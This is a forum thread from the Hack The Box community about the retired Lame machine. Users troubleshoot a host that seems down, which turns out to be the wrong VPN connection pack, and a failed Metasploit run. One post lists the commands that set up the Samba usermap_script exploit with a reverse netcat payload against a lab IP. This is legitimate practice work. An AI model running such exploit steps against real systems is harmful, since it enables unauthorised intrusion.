Hosts Seems Down - Lame (Retired Machine)

HTB Content Machines
, , ,
1

Hello, All!

Hope all is well!

Since last week, I have been trying to hack the Lame machine to no avail. I have captured a flag before on the Legacy machine, so I know how to login.
I am experiencing the following issues:

  1. After logging into HTB using “openvpn…”, I start the Lame machine and wait a few minutes to connect.

  2. Once connected to the Lame machine, I open my terminal and start a Nmap scan, typing “nmap -A -T4 -p- 10.10.10.3”

  3. Moments later, I receive the following message:
    “Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-05 10:45 EDT
    Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
    Nmap done: 1 IP address (0 hosts up) scanned in 4.04 seconds”

  4. I tried “-Pn” and the results are the same

Note: This is not the first time that I am attempting to hack the Lame machine. Last week (the last week in August), I was able to run a Nmap scan, seeing all of the open ports as well as the exploits. I made it all the way to running Metasploit.

I am hoping someone can assist me in this matter.

2

So, there are a lot of things which could be affecting this.

  • What is the final message from the openvpn connection string?
  • Can you confirm you are connected (check you have a HTB IP address)
  • Check if you can ping or traceroute to the 10.10.10.3 address
  • Check if you have any firewall or security tooling on the machine (VM or host if applicable) which might be intercepting packets
  • Try starting a different machine and see if you can ping/scan that
  • Try resetting Lame to see if its broken
3

Update:
After posting the initial comment, my Wi-fi network was down for several days. I have switched ISP and I am now able to successfully complete steps 1, 2, and 3 (as mentioned in my initial post). However, I am having difficulty running Metasploit.
Here is my current issue:

In Metasploit, I type the following script:
msf5 > use exploit/multi/samba/usermap_script

It returns with this line:
No payload configured, defaulting to cmd/unix/reverse_netcat

I continue to add in the script line from https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script but the end result is:
Exploit completed, but no session was created.

Before I lost Wi-fi connectivity, I have Googled the line above for days. I have watched videos and still, nothing has changed! I have hacked a machine in the past however, I did not face this issue before.

Type your comment> @TazWake said:

So, there are a lot of things which could be affecting this.

  • What is the final message from the openvpn connection string?
  • Can you confirm you are connected (check you have a HTB IP address)
  • Check if you can ping or traceroute to the 10.10.10.3 address
  • Check if you have any firewall or security tooling on the machine (VM or host if applicable) which might be intercepting packets
  • Try starting a different machine and see if you can ping/scan that
  • Try resetting Lame to see if its broken
4

@IamHathor said:

It returns with this line:
No payload configured, defaulting to cmd/unix/reverse_netcat

Have you tried configuring a payload?

If not, it might be worth spinning up a netcat listener to see if that one is sending anything back.

5

I have tried doing that but I believe I am doing something wrong.
In Metasploit, I type in the following:

msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads
…lists of payloads…

msf5 exploit(multi/samba/usermap_script) > set payload 25
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > show targets
…targets…

msf5 exploit(multi/samba/usermap_script) > set target 0
target => 0
msf5 exploit(multi/samba/usermap_script) > show options
…options…

msf5 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3

msf5 exploit(multi/samba/usermap_script) > run

[] Started reverse TCP handler on 10.0.0.193:4444
[] Exploit completed, but no session was created.

6

Same here. I’m brand new here on HTB and a bit of a noob and upgraded to VIP to get some guided practice. I’m trying to reach this box and am unable. Most retired boxes show no response. I did a ping sweep and could reach 10.10.179-207 which looks to be anything north of .179, and 207 i think is the highest IP in use. Any suggestions?

7

@dahmed556 said:
Same here. I’m brand new here on HTB and a bit of a noob and upgraded to VIP to get some guided practice. I’m trying to reach this box and am unable. Most retired boxes show no response. I did a ping sweep and could reach 10.10.179-207 which looks to be anything north of .179, and 207 i think is the highest IP in use. Any suggestions?

ok… i know what was wrong. Now it seems obvious. In opening a support ticket, they ask for VPN server listed in the connection pack. and it was labed “free”. After upgrading to VIP i needed to regenerate the connection pack… whoops :neutral:

8

Thanks guys for the posts. I am also new in HTB and faced the same problem.
Then i resolved it. For my case, i was connected to wrong vpn environment instead of HTB lab

  1. Go to Dashboard.
  2. Then click VPN connection
  3. Then check the VPN pack you downloaded. It supposed to be under “HTB Lab Access Details” if your subscription is VIP
  4. Then download the vpnpack and it will work.

Prior to these I received all ports are filtered in nmap scan result without and ping response. But now ping and nmap scan both are okay.